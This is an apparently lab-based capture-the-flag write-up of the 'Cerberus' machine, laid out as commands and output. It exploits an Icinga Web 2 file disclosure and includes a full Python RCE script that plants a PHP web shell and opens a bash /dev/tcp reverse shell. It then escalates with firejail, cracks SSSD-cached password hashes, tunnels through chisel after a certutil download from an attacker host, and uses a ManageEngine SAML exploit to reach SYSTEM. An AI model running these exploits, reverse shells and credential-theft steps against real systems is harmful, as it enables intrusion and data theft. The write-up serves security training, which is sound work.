Scanning
> TARGET=<target-ip> && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack ttl 62 Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
- Domain:
icinga.cerberus.local
Arbitrary File Disclosure (CVE-2022-24716)
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts -v
* Trying <target-ip>:8080...
* Connected to icinga.cerberus.local (<target-ip>) port 8080 (#0)
> GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts HTTP/1.1
> Host: icinga.cerberus.local:8080
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 19 Mar 2023 22:24:42 GMT
< Server: Apache/2.4.52 (Ubuntu)
< Cache-Control: public, max-age=1814400, stale-while-revalidate=604800
< Etag: 40210-125-5f3289e9ec540
< Last-Modified: Thu, 26 Jan 2023 10:57:49 GMT
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/plain;charset=UTF-8
<
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host icinga.cerberus.local left intact
# /etc/passwd | grep home
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
> wfuzz -c -z file,/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u 'http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/FUZZ' --hc 404
000000001: 200 32 L 46 W 1717 Ch "/etc/passwd"
000000015: 200 23 L 206 W 1136 Ch "/etc/crontab"
000000005: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000024: 200 10 L 30 W 293 Ch "/etc/hosts"
000000018: 200 12 L 90 W 657 Ch "/etc/fstab"
000000038: 200 2 L 5 W 26 Ch "/etc/issue"
000000025: 200 10 L 57 W 411 Ch "/etc/hosts.allow"
000000026: 200 17 L 111 W 711 Ch "/etc/hosts.deny"
000000048: 200 21 L 126 W 1524 Ch "/etc/mtab"
000000044: 200 4 L 6 W 104 Ch "/etc/lsb-release"
000000051: 200 29 L 174 W 1126 Ch "/etc/mysql/my.cnf"
000000055: 200 32 L 46 W 1717 Ch "/etc/passwd"
000000070: 200 27 L 97 W 582 Ch "/etc/profile"
000000053: 200 2 L 12 W 91 Ch "/etc/networks"
000000052: 200 12 L 33 W 270 Ch "/etc/network/interfaces"
000000083: 200 53 L 220 W 1650 Ch "/etc/ssh/ssh_config"
000000080: 200 23 L 142 W 920 Ch "/etc/resolv.conf"
000000081: 200 242 L 1486 W 8950 Ch "/etc/samba/smb.conf"
000000109: 200 65 L 390 W 3404 Ch "/proc/modules"
000000107: 200 47 L 163 W 1157 Ch "/proc/ioports"
000000106: 200 31 L 143 W 1350 Ch "/proc/interrupts"
000000108: 200 50 L 146 W 1391 Ch "/proc/meminfo"
000000104: 200 27 L 148 W 819 Ch "/proc/cpuinfo"
000000105: 200 31 L 55 W 367 Ch "/proc/filesystems"
000000110: 200 21 L 126 W 1524 Ch "/proc/mounts"
000000112: 200 2 L 10 W 100 Ch "/proc/swaps"
000000114: 200 2 L 15 W 156 Ch "/proc/self/net/arp"
000000111: 200 9 L 1494 W 3129 Ch "/proc/stat"
000000113: 200 1 L 23 W 179 Ch "/proc/version"
000000181: 200 0 L 0 W 0 Ch "/var/log/dpkg.log"
000000188: 200 0 L 1 W 32032 Ch "/var/log/faillog"
000000199: 200 0 L 2 W 292292 Ch "/var/log/lastlog"
000000224: 200 1 L 2 W 1152 Ch "/var/run/utmp"
000000220: 200 86 L 151 W 92142 Ch "/var/log/wtmp"
> wfuzz -c -z file,/usr/share/wordlists/PayloadsAllTheThings/File\ Inclusion/Intruders/Linux-files.txt -u 'http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/FUZZ' --hc 404
000000001: 200 32 L 46 W 1717 Ch "/etc/passwd"
000000003: 200 10 L 30 W 293 Ch "/etc/hosts"
000000007: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000008: 200 15 L 46 W 320 Ch "/etc/apache2/ports.conf"
000000002: 200 63 L 63 W 825 Ch "/etc/group"
000000005: 200 2 L 5 W 26 Ch "/etc/issue"
000000017: 200 29 L 174 W 1126 Ch "/etc/mysql/my.cnf"
000000016: 200 355 L 1050 W 8181 Ch "/etc/init.d/apache2"
000000025: 200 1 L 3 W 80 Ch "/proc/cmdline"
000000024: 200 1 L 23 W 179 Ch "/proc/version"
000000026: 200 21 L 126 W 1524 Ch "/proc/mounts"
# https://icinga.com/docs/icinga-web/latest/doc/03-Configuration/
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"
[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"
[themes]
[authentication]
# https://icinga.com/docs/icinga-web/latest/doc/05-Authentication/
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/authentication.ini
[icingaweb2]
backend = "db"
resource = "icingaweb2"
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/roles.ini
[Administrators]
users = "matthew"
permissions = "*"
groups = "Administrators"
unrestricted = "1"
# https://icinga.com/docs/icinga-web/latest/doc/04-Resources/
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"
- This can be used to login to the portal:
matthew:IcingaWebPassword2023
RCE: www-data, CVE-2022-24715
import collections
import collections.abc
collections.Callable = collections.abc.Callable
import requests
import bs4
import argparse
import random
import string
def get_csrf(resp):
soup = bs4.BeautifulSoup(resp.text, "lxml")
csrf_token = soup.find("input", {"id": "CSRFToken"})["value"]
return csrf_token
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='lol')
parser.add_argument('-i', '--ip', help='nc listener ip', required=True)
parser.add_argument('-p', '--port', help='nc listener port', required=True)
args = parser.parse_args()
session = requests.session()
# LOGIN
URL = "http://icinga.cerberus.local:8080/icingaweb2/authentication/login"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"username":"matthew","password":"IcingaWebPassword2023","rememberme":"0","redirect":"","formUID":"form_login","CSRFToken":csrf_token,"btn_submit":"Login"}
resp = session.post(URL, data=data)
# CHANGE MODULE PATH
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/general"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"global_show_stacktraces":"0","global_show_stacktraces":"1","global_show_application_state_messages":"0","global_show_application_state_messages":"1","global_module_path":"/dev/","global_config_resource":"icingaweb2","logging_log":"syslog","logging_level":"ERROR","logging_application":"icingaweb2","logging_facility":"user","themes_default":"Icinga","themes_disabled":"0","authentication_default_domain":"","formUID":"form_config_general","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
resp = session.post(URL, data=data)
# ENABLE MODULE
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/moduleenable"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"identifier":"shm","CSRFToken":csrf_token,"btn_submit":"btn_submit"}
resp = session.post(URL, data=data)
# UPLOAD SSH KEY
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"type":"ssh","name":"test","user":"test","private_key":"-----BEGIN RSA PRIVATE KEY-----\r\n\
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\r\n\
-----END RSA PRIVATE KEY-----","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
resp = session.post(URL, data=data)
# EXPLOIT: WRITE PHP FILE
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"type":"ssh","name":"asdf2","user":"../../../../../dev/shm/run.php","private_key":"file:///etc/icingaweb2/ssh/test\x00<?php system($_REQUEST['cmd']);?>","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
resp = session.post(URL, data=data)
# GET REVERSE SHELL
URL = "http://icinga.cerberus.local:8080/icingaweb2/shm/run"
data = {"cmd":"bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(args.ip,args.port)}
session.post(URL, data=data)
Container PE: www-data to root
> python3 -c 'import pty; pty.spawn("/bin/bash")'
- Run two sessions for the exploit
# session 1
ww-data@icinga:/tmp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@icinga:/tmp$ python3 run.py
python3 run.py
You can now run 'firejail --join=4947' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
# session 2
www-data@icinga:/usr/share/icingaweb2/public$ firejail --join=4947
firejail --join=4947
Warning: cleaning all supplementary groups
changing root to /proc/4947/root
Child process initialized in 15.48 ms
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
su
id
uid=0(root) gid=0(root) groups=0(root)
[*]RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*]AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*]AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : CERBERUS.LOCAL
SERVICE PRINCIPAL : ICINGA$/
NTLM HASH : af70cf6b33f1cce788138d459f676faf
AES-256 HASH : 38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f
AES-128 HASH : 1241a65425ce5c7a0f06be09e8217274
root:$y$j9T$iDnIMFDR5Pjqp.dldRtrg0$FhxWiIqluAaMK39nxoUpj9epEDaPEXAbMxQIadWVAM4:19380:0:99999:7:::
matthew:$6$HkKm5zbYWwK3tAcR$btg9SAayzruD.TQj9VsJKL5sv2QceAZ2wWxkXvfj6xEtWO3YkkjusQVge/IBPgOt66sVssNEvAbjhR7fhJcg5.
User flag
- Found cached files under
/var/lib/sss/db/
root@icinga:~# ls -ls /var/lib/sss/db/
ls -ls /var/lib/sss/db/
total 5028
1256 -rw-r--r-- 1 root root 1286144 Mar 19 20:52 cache_cerberus.local.ldb
4 -rw------- 1 root root 2715 Mar 2 12:33 ccache_CERBERUS.LOCAL
1256 -rw------- 1 root root 1286144 Mar 20 09:36 config.ldb
1256 -rw------- 1 root root 1286144 Jan 22 18:32 sssd.ldb
1256 -rw-r--r-- 1 root root 1286144 Mar 1 12:07 timestamps_cerberus.local.ldb
root@icinga:~# strings /var/lib/sss/db/cache_cerberus.local.ldb | grep '$6'
strings /var/lib/sss/db/cache_cerberus.local.ldb | grep '$6'
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
- Crack using
john gives 147258369, this is password for user matthew
> john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
147258369 (?)
1g 0:00:00:02 DONE 2/3 (2023-03-20 06:18) 0.4587g/s 1056p/s 1056c/s 1056C/s ilovegod..karla
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# kali
> chisel server -p 9999 --reverse
# target
> chisel client --max-retry-count=1 <attacker-ip>:9999 R:1080:socks
- Use
evil-winrm to login as matthew
> proxychains evil-winrm -i 172.16.22.1 -u 'matthew' -p 147258369
*Evil-WinRM* PS C:\Users\matthew\desktop> cat user.txt
17b793639b70ba42f7f3d9d1f51c84f7
PE: matthew -> system, CVE-2022-47966
- Enum the target, you will eventually see a folder
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\ - Enum the directory, your find this is running ASSelfService Plus 6.2, which has an unauth’d RCE vulnerability:
CVE-2022-47966 - To exploit this, we will need several things,
guid, issuer_url, forward the saml endpoint ports - From the local ports, we don’t see the ports for the saml endpoint (i.e 9251) nor any web application (i.e 80, 443). But in fact, both 443 and 9251 are open to localhost with tls/ssl
[+] Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : CERBERUS
TCP 127.0.0.1 31000 127.0.0.1 32000 Established 5212 java
TCP 127.0.0.1 32000 0.0.0.0 0 Listening 1952 wrapper
TCP 127.0.0.1 32000 127.0.0.1 31000 Established 1952 wrapper
TCP 127.0.0.1 33308 0.0.0.0 0 Listening 6460 postgres
TCP 127.0.0.1 33308 127.0.0.1 52845 Established 6460 postgres
TCP 127.0.0.1 49899 0.0.0.0 0 Listening 5212 java
TCP 127.0.0.1 51181 127.0.0.1 51182 Established 5212 java
TCP 127.0.0.1 51182 127.0.0.1 51181 Established 5212 java
TCP 127.0.0.1 51183 127.0.0.1 51184 Established 5212 java
TCP 127.0.0.1 51184 127.0.0.1 51183 Established 5212 java
TCP 127.0.0.1 51186 127.0.0.1 51187 Established 5212 java
TCP 127.0.0.1 51187 127.0.0.1 51186 Established 5212 java
TCP 127.0.0.1 51188 127.0.0.1 51189 Established 5212 java
TCP 127.0.0.1 51189 127.0.0.1 51188 Established 5212 java
TCP 127.0.0.1 51190 127.0.0.1 51191 Established 5212 java
TCP 127.0.0.1 51191 127.0.0.1 51190 Established 5212 java
TCP 127.0.0.1 51192 127.0.0.1 51193 Established 5212 java
TCP 127.0.0.1 51193 127.0.0.1 51192 Established 5212 java
TCP 127.0.0.1 52845 127.0.0.1 33308 Established 5212 java
- You can find the guid in the access logs
*Evil-WinRM* PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\logs> cat access_log_2.txt
# read through the log and find the following
https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
- We need to forward two ports to local, 443 and 9251
# upload chisel to the target
> certutil.exe -urlcache -f http://<attacker-ip>/chisel.exe chisel.exe
> .\chisel.exe client --max-retry-count=1 <attacker-ip>:9999 R:443:localhost:443 R:9251:localhost:9251
- To find the issuer url: have burp running and browse to
https://dc.cerberus.local:9251/adminLogin.cc to login and click on the ADFS icon. You should be able to see the following SAMl requests
GET https://dc.cerberus.local/adfs/ls/?SAMLRequest=...&RelayState=...
POST https://dc.cerberus.local/adfs/ls/?SAMLRequest=...&RelayState=...&client-request-id=8f43453e-3c48-4613-9306-0080000000ed
GET https://dc.cerberus.local/adfs/ls/?SAMLRequest=...&RelayState=...&client-request-id=8f43453e-3c48-4613-9306-0080000000ed
POST https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
- In the second request, the server will set a cookie with base64 encoded values, decode the cookie and you should find the issuer url
Set-Cookie: MSISAuth=...
# after decoding, this is the samlresponse to your authentication request, the issuer url can be found inside
<Issuer xmlns="urn:oasis:names:tc:SAML:2.0:assertion">http://dc.cerberus.local/adfs/services/trust</Issuer>
# set parameters like below
GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
ISSUER_URL http://dc.cerberus.local/adfs/services/trust
RHOSTS 127.0.0.1
RPORT 9251
SSL true
TARGETURI /samlLogin
# run the exploit and get a shell
meterpreter > shell
Process 3492 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.4010]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin>whoami
whoami
nt authority\system
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D9B1-79BF
Directory of c:\Users\Administrator\Desktop
03/06/2023 12:50 PM <DIR> .
03/06/2023 12:50 PM <DIR> ..
03/20/2023 01:42 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,395,042,304 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
1aeb946c7276047287158b2d8598cb73
